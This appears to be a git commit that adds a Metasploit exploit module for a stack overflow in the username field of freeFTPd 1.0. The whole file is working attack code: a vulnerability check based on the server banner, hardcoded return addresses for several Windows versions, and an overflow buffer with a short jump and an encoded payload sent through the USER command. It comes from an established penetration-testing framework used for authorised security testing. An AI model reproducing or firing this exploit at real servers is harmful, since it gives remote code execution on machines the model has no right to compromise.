Ported

git-svn-id: file:///home/svn/incoming/trunk@3072 4d416f70-5f16-0410-b530-b9f4589650da
2005-11-24 03:48:16 +00:00 · 2005-11-24 03:48:16 +00:00 · 6e2391b667
parent 10a95de4da
commit 6e2391b667
1 changed files with 96 additions and 0 deletions
--- a/modules/exploits/windows/ftp/freeftpd_user.rb
+++ b/modules/exploits/windows/ftp/freeftpd_user.rb
@ -0,0 +1,96 @@
+require 'msf/core/exploit/ftp'
+
+module Msf
+
+class Exploits::Windows::Ftp::FreeFTPDUserOverflow < Msf::Exploit::Remote
+
+	include Exploit::Remote::Ftp
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'freeFTPd 1.0 Username Overflow',
+			'Description'    => %q{
+				This module exploits a stack overflow in the freeFTPd
+				multi-protocol file transfer service. This flaw can only be
+				exploited when logging has been enabled (non-default).
+					
+			},
+			'Author'         => [ 'y0 [at] w00t-shell.net' ],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'],
+
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'    => 800,
+					'BadChars' => "\x00\x20\x0a\x0d",
+					'StackAdjustment' => -3500,
+				},
+			'Targets'        => 
+				[
+					[ 
+						'Windows 2000 English ALL',
+						{
+							'Platform' => 'win',
+							'Rets'     => [ 0x75022ac4 ],
+						},
+					],
+					[ 
+						'Windows XP Pro SP0/SP1 English',
+						{
+							'Platform' => 'win',
+							'Rets'     => [ 0x71aa32ad ],
+						},
+					],
+					[ 
+						'Windows NT SP5/SP6a English',
+						{
+							'Platform' => 'win',
+							'Rets'     => [ 0x776a1799 ],
+						},
+					],
+					[ 
+						'Windows 2003 Server English',
+						{
+							'Platform' => 'win',
+							'Rets'     => [ 0x7ffc0638 ],
+						},
+					],																							
+				]))
+	end
+
+	def check
+		connect
+		banner = sock.get_once
+		disconnect
+		
+		if (banner =~ /freeFTPd 1\.0/)
+			print_status("This system appears to be vulnerable")
+			return Exploit::CheckCode::Vulnerable
+		else
+			print_status("This system does not appear to be vulnerable")
+		end
+	end
+	
+	def exploit
+		connect
+
+		print_status("Trying target #{target.name}...")
+
+		buf = Rex::Text.rand_text_english(1016, payload_badchars)
+		buf[1008, 2] = "\xeb\x06"		
+		buf[1012, 4] = [ target['Rets'][0] ].pack('V')
+		buf << payload.encoded
+
+		send_user(buf)
+
+		disconnect
+
+		handler
+	end
+
+end
+end